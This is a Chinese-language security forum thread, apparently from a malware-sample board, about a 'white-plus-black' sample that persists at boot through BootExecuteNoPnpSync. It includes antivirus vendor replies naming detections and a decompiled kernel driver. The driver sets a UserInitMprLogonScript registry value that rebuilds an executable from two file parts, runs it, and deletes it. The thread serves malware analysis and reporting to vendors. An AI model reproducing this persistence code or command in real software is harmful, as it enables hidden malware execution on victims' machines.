通过BootExecuteNoPnpSync环境变量开机启动的白加黑1x

328397663

除了这个其他上传

328397663

q937794222 发表于 2025-5-13 16:45
火绒 VSHive.dll miss

Re: Virus
安全实验室<seclab@huorong.cn>
我<328397663@qq.com>
您好，恶意文件已处理，下一版本升级后即可查杀，感谢您的反馈。

pal家族

Hello,

New malicious software was found in the attached file:
BEB.exe - Trojan.Win64.Starter.bx

Its detection will be included in the next update.

This file is already detected (1.j+2.j binary concatenated):
Trojan.MSIL.BypassUAC.avp

No malicious software was found in the remaining attached files.
Thank you for your help.

Best regards, Vladislav, Malware Analyst

wowocock

NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  NTSTATUS v2; // eax
  const WCHAR *v3; // rdx
  struct _UNICODE_STRING DisplayString; // [rsp+30h] [rbp-19h] BYREF
  struct _UNICODE_STRING Data; // [rsp+40h] [rbp-9h] BYREF
  struct _UNICODE_STRING DestinationString; // [rsp+50h] [rbp+7h] BYREF
  struct _UNICODE_STRING ValueName; // [rsp+60h] [rbp+17h] BYREF
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+70h] [rbp+27h] BYREF
  void *KeyHandle; // [rsp+B0h] [rbp+67h] BYREF

  *(&ObjectAttributes.Length + 1) = 0;
  *(&ObjectAttributes.Attributes + 1) = 0;
  KeyHandle = 0i64;
  DestinationString = 0i64;
  ValueName = 0i64;
  Data = 0i64;
  DisplayString = 0i64;
  RtlInitUnicodeString(
    &DestinationString,
    L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment");
  RtlInitUnicodeString(&ValueName, L"UserInitMprLogonScript");
  RtlInitUnicodeString(
    &Data,
    L"cmd /c copy /b \"C:\\Users\\Public\\Documents\\1.j\" + \"C:\\Users\\Public\\Documents\\2.j\" \"C:\\Users\\Public\\Do"
     "cuments\\TenioDL.exe\" && start \"\" \"C:\\Users\\Public\\Documents\\TenioDL.exe\" && timeout /t 2 && del /f /q \"C"
     ":\\Users\\Public\\Documents\\TenioDL.exe\"");
  ObjectAttributes.Length = 48;
  ObjectAttributes.ObjectName = &DestinationString;
  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.Attributes = 64;
  *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
  if ( NtOpenKey(&KeyHandle, 2u, &ObjectAttributes) < 0 )
  {
    RtlInitUnicodeString(&DisplayString, "鄀誰Sb");
  }
  else
  {
    v2 = NtSetValueKey(KeyHandle, &ValueName, 0, 1u, Data.Buffer, Data.Length);
    v3 = (const WCHAR *)&unk_1400022E8;
    if ( v2 < 0 )
      v3 = &word_140002300;
    RtlInitUnicodeString(&DisplayString, v3);
    NtClose(KeyHandle);
  }
  return NtDisplayString(&DisplayString);
}
贪根不除，腐树常在。

Rukia

pal家族 发表于 2025-5-14 15:43
Hello,

New malicious software was found in the attached file:

你这个上报途径是Opentip还是newvirus@kaspersky.com?

pal家族

Rukia 发表于 2025-5-14 18:20
你这个上报途径是Opentip还是?

我这次是newvirus